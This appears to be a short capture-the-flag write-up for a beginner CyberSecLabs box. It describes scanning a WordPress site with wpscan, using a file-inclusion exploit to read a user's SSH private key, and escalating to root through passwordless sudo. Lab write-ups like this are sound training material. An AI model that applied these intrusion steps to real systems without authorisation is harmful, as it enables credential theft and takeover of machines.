For my second write up, I bring to you another box from CyberSecLabs called CMS. This is another beginner lab with some pretty simple exploitation. Let’s dive right in shall we?
Nmap is always my first step towards enumeration, we can see that there are only two ports open; 22- which is ssh, & 80- which is an http server.
We can see that the server is running WordPress on port 80, there is a great, well known tool to enumerate this deeper..
Wpscan is a multi use wordpress scanner that we will use to scan WordPress for plugins they’re using, as well as interesting paths.
wpscan --url 172.31.1.8
With this plug-in comes an RFI (remote file inclusion) exploit that lets us view files on the system.
With the http payload I found on exploit-db, appended with a path to angels ssh key (he so kindly told us the path to in his blog), we were able to view the id_rsa key.
All we needed to do was edit the format, and change the permissions on the key, so that we can use it to ssh onto the box.
ssh -i angels-id_rsa angel@172.31.1.8Boom! We have le shell.
From the user shell it is quite an easy privilege escalation and there are multiple ways you can go about it.
sudo -lWill show us that we can run any command as the root user with no password, easy! I decided to use the simple one line command to escalate privilege to root.
sudo su And that’s all folks!
